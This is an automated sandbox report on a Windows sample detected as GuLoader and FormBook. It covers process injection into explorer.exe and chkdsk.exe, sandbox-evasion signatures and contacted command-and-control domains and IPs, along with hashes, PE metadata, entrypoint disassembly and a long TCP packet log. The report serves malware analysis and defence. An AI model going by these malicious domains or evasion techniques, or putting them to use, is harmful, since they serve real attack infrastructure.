Source: explorer.exe, 0000001D.00000000.443775081.0000000006860000.00000004.00000001.sdmp, chkdsk.exe, 0000001F.00000002.1287403199.00000000068D0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000001D.00000000.454839868.0000000001980000.00000002.00000001.sdmp, chkdsk.exe, 0000001F.00000002.1287403199.00000000068D0000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: explorer.exe, 0000001D.00000000.454839868.0000000001980000.00000002.00000001.sdmp, chkdsk.exe, 0000001F.00000002.1287403199.00000000068D0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock

      Stealing of Sensitive Information:

GuLoader behavior detected
Source: Initial file | Signature Results: GuLoader behavior
Yara detected FormBook
Source: Yara match | File source: 00000012.00000002.475233799.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.1285321494.0000000004EF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.1284276742.0000000000C20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.480114894.000000001E160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000000.464429746.000000000618B000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.1285203514.0000000004EC0000.00000040.00000001.sdmp, type: MEMORY
Yara detected Generic Dropper
Source: Yara match | File source: Process Memory Space: F63V4i8eZU.exe PID: 772, type: MEMORY
Source: Yara match | File source: Process Memory Space: chkdsk.exe PID: 5756, type: MEMORY

      Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 00000012.00000002.475233799.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.1285321494.0000000004EF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.1284276742.0000000000C20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.480114894.000000001E160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000000.464429746.000000000618B000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.1285203514.0000000004EC0000.00000040.00000001.sdmp, type: MEMORY

      Mitre Att&ck Matrix

Techniques per tactic column (trailing digits after a technique name are the count badges shown in the original matrix):

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
Execution: Shared Modules 1; Scheduled Task/Job; At (Linux); At (Windows); Cron
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script
Privilege Escalation: Process Injection 512; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script
Defense Evasion: Rootkit 1; Virtualization/Sandbox Evasion 22; Process Injection 512; Deobfuscate/Decode Files or Information 1; Obfuscated Files or Information 3
Credential Access: Credential API Hooking 1; LSASS Memory; Security Account Manager; NTDS; LSA Secrets
Discovery: Security Software Discovery 621; Virtualization/Sandbox Evasion 22; Process Discovery 2; Remote System Discovery 1; System Information Discovery 31
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
Collection: Credential API Hooking 1; Archive Collected Data 1; Data from Network Shared Drive; Input Capture; Keylogging
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits
Command and Control: Encrypted Channel 12; Ingress Tool Transfer 3; Non-Application Layer Protocol 3; Application Layer Protocol 14; Fallback Channels
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings

      Behavior Graph

Behavior Graph ID: 450884 | Sample: F63V4i8eZU.exe | Start date: 19/07/2021 | Architecture: WINDOWS | Score: 100

The graph rendered on the page, written out as a process tree (each node lists the DNS/IP contacts and the signatures attached to it):

Start
  Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 7 other signatures
  -> F63V4i8eZU.exe (started)
     Signatures: Contains functionality to detect hardware virtualization (CPUID execution measurement); Detected RDTSC dummy instruction sequence (likely for instruction hammering); Tries to detect Any.run; 3 other signatures
     -> F63V4i8eZU.exe (started)
        DNS/IP: kinmirai.org 133.130.104.18, 443, 49746, INTERQGMOInternetIncJP, Japan
        Signatures: Modifies the context of a thread in another process (thread injection); Tries to detect Any.run; Maps a DLL or memory area into another process; 3 other signatures
        -> explorer.exe (injected)
           DNS/IP: www.howtovvbucks.com 81.17.18.196, 49753, 80, PLI-ASCH, Switzerland; 137gate.com 31.44.185.28, 80, PINDC-ASRU, Russian Federation; 22 other IPs or domains
           Signatures: System process connects to network (likely due to code injection or exploit)
           -> chkdsk.exe (started)
              Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
              -> cmd.exe (started)
                 -> conhost.exe (started)


      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

Source | Detection | Scanner | Label
F63V4i8eZU.exe | 10% | Virustotal |
F63V4i8eZU.exe | 9% | ReversingLabs | Win32.Trojan.Convagent

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs


      Domains and IPs

      Contacted Domains


                                                      Contacted URLs


                                                      URLs from Memory and Binaries


                                                                                Contacted IPs


                                                                                Public


Private

IP: 192.168.2.1

General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 450884
Start date: 19.07.2021
Start time: 20:19:50
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 15m 26s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: F63V4i8eZU.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Suspected Instruction Hammering Hide Perf
Number of new started processes analysed: 42
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/0@17/13
EGA Information: Failed
HDC Information:
• Successful, ratio: 60.4% (good quality ratio 52.5%)
• Quality average: 71.6%
• Quality standard deviation: 33.5%
HCA Information:
• Successful, ratio: 60%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, MusNotifyIcon.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 40.88.32.150, 52.147.198.201, 23.211.6.115, 23.211.4.86, 20.50.102.62, 20.54.110.249, 40.112.88.60, 80.67.82.211, 80.67.82.235, 23.203.67.116, 23.203.69.124, 20.190.159.136, 40.126.31.135, 40.126.31.6, 40.126.31.1, 40.126.31.8, 40.126.31.4, 20.190.159.138, 40.126.31.143, 93.184.220.29, 20.73.194.208, 40.127.240.158, 51.104.136.2
• Excluded domains from analysis (whitelisted): cs9.wac.phicdn.net, www.tm.lg.prod.aadmsa.akadns.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, e15275.g.akamaiedge.net, arc.msn.com, cdn.onenote.net.edgekey.net, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, ocsp.digicert.com, wildcard.weather.microsoft.com.edgekey.net, login.live.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, cdn.onenote.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, tile-service.weather.microsoft.com, e1723.g.akamaiedge.net, settings-win.data.microsoft.com, www.tm.a.prd.aadg.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, login.msa.msidentity.com, settingsfd-geo.trafficmanager.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, e1553.dspg.akamaiedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

                                                                                Simulations

                                                                                Behavior and APIs

                                                                                No simulations

                                                                                Joe Sandbox View / Context

                                                                                IPs


                                                                                Domains

Match         Associated Sample Name / URL   Detection   Context
137gate.com   ZGNX11JMSc.exe                 malicious   31.44.185.28
137gate.com   spices requirement.xlsx        malicious   31.44.185.28

                                                                                ASN


                                                                                JA3 Fingerprints


                                                                                Dropped Files

                                                                                No context

                                                                                Created / dropped Files

                                                                                No created / dropped files found

                                                                                Static File Info

                                                                                General

                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Entropy (8bit):4.804431914533398
                                                                                TrID:
                                                                                • Win32 Executable (generic) a (10002005/4) 99.15%
                                                                                • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                File name:F63V4i8eZU.exe
                                                                                File size:271464
                                                                                MD5:08730cdd286a4c9d46b38bb6545ac311
                                                                                SHA1:001bb7b5b8d63e505661d7e4a178d08abe6bbad7
                                                                                SHA256:cb2a2537987e45c8461d40a0ec6c24215920519257134db91dd1369ff5abf342
                                                                                SHA512:a6531eb4709af3e1270f1c4434d9abc87097e9f8d38c4ba5dc0ed61d7f469552de7259f638728fe71297d3748823064f75728e71df3531657a5aeb1952f412d8
                                                                                SSDEEP:1536:d/k1xdvMuWnLtmBcSa9O/C0UzIY+SpAkaYQryC7AfT/k1xD:5ktvMu8GcSaw/RQ80fDkz
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........y.....................................Rich............PE..L.....fI.................`..........<........p....@................

                                                                                File Icon

                                                                                Icon Hash:e8ccce8e8ececce8

                                                                                Static PE Info

                                                                                General

                                                                                Entrypoint:0x40133c
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:true
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                DLL Characteristics:
                                                                                Time Stamp:0x49669CB5 [Fri Jan 9 00:39:17 2009 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:4
                                                                                OS Version Minor:0
                                                                                File Version Major:4
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:4
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:ce5c4ac311690d884b7f964e897cf716

                                                                                Authenticode Signature

                                                                                Signature Valid:false
                                                                                Signature Issuer:E=MIDLE@perkysex.Sta, CN=Tykho, OU=LRDAGSD, O=Oedogo, L=gener, S=Succuss7, C=FO
                                                                                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                Error Number:-2146762487
                                                                                Not Before, Not After
                                                                                • 7/19/2021 1:52:32 AM 7/19/2022 1:52:32 AM
                                                                                Subject Chain
                                                                                • E=MIDLE@perkysex.Sta, CN=Tykho, OU=LRDAGSD, O=Oedogo, L=gener, S=Succuss7, C=FO
                                                                                Version:3
                                                                                Thumbprint MD5:6B2F2AEC1CD19ADB58F69D332AA6EB10
                                                                                Thumbprint SHA-1:A168A0624017FAD1687EFD7218165EAAD0667521
                                                                                Thumbprint SHA-256:7B29D7974E330B45B5772C1F20898DB73558EAF4668727D08A94229F6C2C5A9A
                                                                                Serial:00

                                                                                Entrypoint Preview

                                                                                Instruction
                                                                                push 00432170h
                                                                                call 00007EFE34D60953h
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                xor byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                inc eax
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add bh, dl
                                                                                xor ebx, dword ptr [esi+54DBD587h]
                                                                                inc esp
                                                                                mov dword ptr [ebx], ebp
                                                                                sbb al, byte ptr [edx]
                                                                                mov edi, 0052F3B1h
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [ecx], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [edx+00h], al
                                                                                push es
                                                                                push eax
                                                                                add dword ptr [ecx], 61h
                                                                                jnc 00007EFE34D609D6h
                                                                                jc 00007EFE34D609CCh
                                                                                jnc 00007EFE34D609CDh
                                                                                add byte ptr [eax], al
                                                                                add ah, ah
                                                                                jbe 00007EFE34D60969h
                                                                                add eax, dword ptr [eax]
                                                                                add byte ptr [eax], al
                                                                                add bh, bh
                                                                                int3
                                                                                xor dword ptr [eax], eax
                                                                                adc ecx, dword ptr [eax+03h]
                                                                                stosd
                                                                                cmp dword ptr [ecx+ecx*4-174BB90Fh], eax
                                                                                aas
                                                                                insb
                                                                                jmp 00007EFDB759C1B5h
                                                                                jecxz 00007EFE34D6098Ah
                                                                                dec eax
                                                                                sbb dl, byte ptr [ecx+738049FEh]
                                                                                fld qword ptr [edi+62h]
                                                                                out dx, eax
                                                                                jnbe 00007EFE34D6095Fh
                                                                                cmp cl, byte ptr [edi-53h]
                                                                                xor ebx, dword ptr [ecx-48EE309Ah]
                                                                                or al, 00h
                                                                                stosb
                                                                                add byte ptr [eax-2Dh], ah
                                                                                xchg eax, ebx
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                push eax
                                                                                or al, 03h
                                                                                add byte ptr [esi+0000007Bh], dl
                                                                                pop es
                                                                                add byte ptr [eax+6Fh], dl
                                                                                jnc 00007EFE34D609CBh
                                                                                je 00007EFE34D609CBh
                                                                                xor eax, 07010D00h
                                                                                add byte ptr [edi+72h], cl
                                                                                jc 00007EFE34D609C8h
                                                                                bound esi, dword ptr [edx]

                                                                                Data Directories

                                                                                 Name | Virtual Address | Virtual Size | Is in Section
                                                                                 IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                                 IMAGE_DIRECTORY_ENTRY_IMPORT | 0x364a4 | 0x28 | .text
                                                                                 IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x38000 | 0x80e2 | .rsrc
                                                                                 IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                                 IMAGE_DIRECTORY_ENTRY_SECURITY | 0x41050 | 0x1418 |
                                                                                 IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                                                 IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1100 | 0x1c | .text
                                                                                 IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                                 IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                                 IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                                 IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                                 IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x228 | 0x20 |
                                                                                 IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x100 | .text
                                                                                 IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                                 IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                                                 IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                                                Sections

                                                                                 Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                                 .text | 0x1000 | 0x35908 | 0x36000 | False | 0.261126482928 | data | 4.74357269576 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                 .data | 0x37000 | 0xb90 | 0x1000 | False | 0.00634765625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                 .rsrc | 0x38000 | 0x80e2 | 0x9000 | False | 0.31982421875 | data | 4.39996163411 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                Resources

                                                                                 Name | RVA | Size | Type | Language | Country
                                                                                 RT_ICON | 0x3fa7a | 0x668 | dBase IV DBT of `.DBF, block length 1536, next free block index 40, next free block 4265541880, next used block 7936 | |
                                                                                 RT_ICON | 0x3f792 | 0x2e8 | data | |
                                                                                 RT_ICON | 0x3f5aa | 0x1e8 | data | |
                                                                                 RT_ICON | 0x3f482 | 0x128 | GLS_BINARY_LSB_FIRST | |
                                                                                 RT_ICON | 0x3e5da | 0xea8 | data | |
                                                                                 RT_ICON | 0x3dd32 | 0x8a8 | data | |
                                                                                 RT_ICON | 0x3d66a | 0x6c8 | data | |
                                                                                 RT_ICON | 0x3d102 | 0x568 | GLS_BINARY_LSB_FIRST | |
                                                                                 RT_ICON | 0x3a4fa | 0x2c08 | data | |
                                                                                 RT_ICON | 0x39452 | 0x10a8 | data | |
                                                                                 RT_ICON | 0x38aca | 0x988 | data | |
                                                                                 RT_ICON | 0x38662 | 0x468 | GLS_BINARY_LSB_FIRST | |
                                                                                 RT_GROUP_ICON | 0x385b4 | 0xae | data | |
                                                                                 RT_VERSION | 0x38300 | 0x2b4 | data | English | United States

                                                                                Imports

                                                                                 DLL | Import
                                                                                 MSVBVM60.DLL | _CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaR4Str, __vbaObjVar, DllFunctionCall, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaI4Var, __vbaLateMemCall, __vbaStrToAnsi, __vbaVarDup, _CIatan, __vbaStrMove, _allmul, __vbaLateIdSt, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

                                                                                Version Infos

                                                                                 Description | Data
                                                                                 Translation | 0x0409 0x04b0
                                                                                 LegalCopyright | OFF24
                                                                                 InternalName | ISOL
                                                                                 FileVersion | 7.00
                                                                                 CompanyName | OFF24
                                                                                 LegalTrademarks | OFF24
                                                                                 Comments | OFF24
                                                                                 ProductName | OFF24
                                                                                 ProductVersion | 7.00
                                                                                 FileDescription | OFF24
                                                                                 OriginalFilename | ISOL.exe

                                                                                Possible Origin

                                                                                 Language of compilation system | Country where language is spoken
                                                                                 English | United States

                                                                                Network Behavior

                                                                                Network Port Distribution

                                                                                TCP Packets

                                                                                 Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                 Jul 19, 2021 20:22:21.080987930 CEST | 49746 | 443 | 192.168.2.3 | 133.130.104.18
                                                                                 Jul 19, 2021 20:22:21.394221067 CEST | 443 | 49746 | 133.130.104.18 | 192.168.2.3
                                                                                 Jul 19, 2021 20:22:21.394370079 CEST | 49746 | 443 | 192.168.2.3 | 133.130.104.18
                                                                                 Jul 19, 2021 20:22:21.417826891 CEST | 49746 | 443 | 192.168.2.3 | 133.130.104.18
                                                                                 Jul 19, 2021 20:22:21.730709076 CEST | 443 | 49746 | 133.130.104.18 | 192.168.2.3
                                                                                 Jul 19, 2021 20:22:21.737677097 CEST | 443 | 49746 | 133.130.104.18 | 192.168.2.3
                                                                                 Jul 19, 2021 20:22:21.737735033 CEST | 443 | 49746 | 133.130.104.18 | 192.168.2.3
                                                                                 Jul 19, 2021 20:22:21.737766981 CEST | 443 | 49746 | 133.130.104.18 | 192.168.2.3
                                                                                 Jul 19, 2021 20:22:21.737859964 CEST | 49746 | 443 | 192.168.2.3 | 133.130.104.18
                                                                                 Jul 19, 2021 20:22:21.737929106 CEST | 49746 | 443 | 192.168.2.3 | 133.130.104.18
                                                                                 Jul 19, 2021 20:22:21.871129036 CEST | 49746 | 443 | 192.168.2.3 | 133.130.104.18
                                                                                 Jul 19, 2021 20:22:22.185408115 CEST | 443 | 49746 | 133.130.104.18 | 192.168.2.3
                                                                                 Jul 19, 2021 20:22:22.185559034 CEST | 49746 | 443 | 192.168.2.3 | 133.130.104.18
                                                                                 Jul 19, 2021 20:22:22.210118055 CEST | 49746 | 443 | 192.168.2.3 | 133.130.104.18
                                                                                 Jul 19, 2021 20:22:22.525378942 CEST | 443 | 49746 | 133.130.104.18 | 192.168.2.3
                                                                                 Jul 19, 2021 20:22:22.525439024 CEST | 443 | 49746 | 133.130.104.18 | 192.168.2.3
                                                                                 Jul 19, 2021 20:22:22.525480986 CEST | 443 | 49746 | 133.130.104.18 | 192.168.2.3
                                                                                 Jul 19, 2021 20:22:22.525517941 CEST | 443 | 49746 | 133.130.104.18 | 192.168.2.3
                                                                                 Jul 19, 2021 20:22:22.525522947 CEST | 49746 | 443 | 192.168.2.3 | 133.130.104.18
                                                                                 Jul 19, 2021 20:22:22.525557995 CEST | 443 | 49746 | 133.130.104.18 | 192.168.2.3
                                                                                 Jul 19, 2021 20:22:22.525573969 CEST | 49746 | 443 | 192.168.2.3 | 133.130.104.18
                                                                                 Jul 19, 2021 20:22:22.525595903 CEST | 443 | 49746 | 133.130.104.18 | 192.168.2.3
                                                                                 Jul 19, 2021 20:22:22.525633097 CEST | 443 | 49746 | 133.130.104.18 | 192.168.2.3
                                                                                 Jul 19, 2021 20:22:22.525670052 CEST | 443 | 49746 | 133.130.104.18 | 192.168.2.3
                                                                                 Jul 19, 2021 20:22:22.525707960 CEST | 443 | 49746 | 133.130.104.18 | 192.168.2.3
                                                                                 Jul 19, 2021 20:22:22.525754929 CEST | 443 | 49746 | 133.130.104.18 | 192.168.2.3
                                                                                 Jul 19, 2021 20:22:22.526747942 CEST | 49746 | 443 | 192.168.2.3 | 133.130.104.18
                                                                                 Jul 19, 2021 20:22:22.526801109 CEST | 49746 | 443 | 192.168.2.3 | 133.130.104.18
                                                                                 Jul 19, 2021 20:22:22.526806116 CEST | 49746 | 443 | 192.168.2.3 | 133.130.104.18
                                                                                 Jul 19, 2021 20:22:22.526808977 CEST | 49746 | 443 | 192.168.2.3 | 133.130.104.18
                                                                                 Jul 19, 2021 20:22:22.838639021 CEST | 443 | 49746 | 133.130.104.18 | 192.168.2.3
                                                                                 Jul 19, 2021 20:22:22.838675976 CEST | 443 | 49746 | 133.130.104.18 | 192.168.2.3
                                                                                 Jul 19, 2021 20:22:22.838705063 CEST | 443 | 49746 | 133.130.104.18 | 192.168.2.3
                                                                                 Jul 19, 2021 20:22:22.838735104 CEST | 443 | 49746 | 133.130.104.18 | 192.168.2.3
                                                                                 Jul 19, 2021 20:22:22.838771105 CEST | 443 | 49746 | 133.130.104.18 | 192.168.2.3
                                                                                 Jul 19, 2021 20:22:22.838778973 CEST | 49746 | 443 | 192.168.2.3 | 133.130.104.18
                                                                                 Jul 19, 2021 20:22:22.838803053 CEST | 49746 | 443 | 192.168.2.3 | 133.130.104.18
                                                                                 Jul 19, 2021 20:22:22.838805914 CEST | 443 | 49746 | 133.130.104.18 | 192.168.2.3
                                                                                 Jul 19, 2021 20:22:22.838835955 CEST | 49746 | 443 | 192.168.2.3 | 133.130.104.18
                                                                                 Jul 19, 2021 20:22:22.838917971 CEST | 49746 | 443 | 192.168.2.3 | 133.130.104.18
                                                                                 Jul 19, 2021 20:22:22.839443922 CEST | 443 | 49746 | 133.130.104.18 | 192.168.2.3
                                                                                 Jul 19, 2021 20:22:22.839478970 CEST | 443 | 49746 | 133.130.104.18 | 192.168.2.3
                                                                                 Jul 19, 2021 20:22:22.839515924 CEST | 443 | 49746 | 133.130.104.18 | 192.168.2.3
                                                                                 Jul 19, 2021 20:22:22.839525938 CEST | 49746 | 443 | 192.168.2.3 | 133.130.104.18
                                                                                 Jul 19, 2021 20:22:22.839553118 CEST | 443 | 49746 | 133.130.104.18 | 192.168.2.3
                                                                                 Jul 19, 2021 20:22:22.839581013 CEST | 49746 | 443 | 192.168.2.3 | 133.130.104.18
                                                                                 Jul 19, 2021 20:22:22.839586973 CEST | 443 | 49746 | 133.130.104.18 | 192.168.2.3
                                                                                 Jul 19, 2021 20:22:22.839622021 CEST | 443 | 49746 | 133.130.104.18 | 192.168.2.3
                                                                                 Jul 19, 2021 20:22:22.839651108 CEST | 49746 | 443 | 192.168.2.3 | 133.130.104.18
                                                                                 Jul 19, 2021 20:22:22.839657068 CEST | 443 | 49746 | 133.130.104.18 | 192.168.2.3
                                                                                 Jul 19, 2021 20:22:22.839689970 CEST | 49746 | 443 | 192.168.2.3 | 133.130.104.18
                                                                                 Jul 19, 2021 20:22:22.839696884 CEST | 443 | 49746 | 133.130.104.18 | 192.168.2.3
                                                                                 Jul 19, 2021 20:22:22.839734077 CEST | 443 | 49746 | 133.130.104.18 | 192.168.2.3
                                                                                 Jul 19, 2021 20:22:22.839759111 CEST | 49746 | 443 | 192.168.2.3 | 133.130.104.18
                                                                                 Jul 19, 2021 20:22:22.839767933 CEST | 443 | 49746 | 133.130.104.18 | 192.168.2.3
                                                                                 Jul 19, 2021 20:22:22.839827061 CEST | 49746 | 443 | 192.168.2.3 | 133.130.104.18
                                                                                 Jul 19, 2021 20:22:23.151542902 CEST | 443 | 49746 | 133.130.104.18 | 192.168.2.3
                                                                                 Jul 19, 2021 20:22:23.151568890 CEST | 443 | 49746 | 133.130.104.18 | 192.168.2.3
                                                                                Jul 19, 2021 20:22:23.151585102 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.151607037 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.151627064 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.151645899 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.151648045 CEST49746443192.168.2.3133.130.104.18
                                                                                Jul 19, 2021 20:22:23.151673079 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.151680946 CEST49746443192.168.2.3133.130.104.18
                                                                                Jul 19, 2021 20:22:23.151693106 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.151746035 CEST49746443192.168.2.3133.130.104.18
                                                                                Jul 19, 2021 20:22:23.152281046 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.152298927 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.152313948 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.152328968 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.152348042 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.152359962 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.152376890 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.152391911 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.152405977 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.152425051 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.152437925 CEST49746443192.168.2.3133.130.104.18
                                                                                Jul 19, 2021 20:22:23.152458906 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.152481079 CEST44349746133.130.104.18192.168.2.3
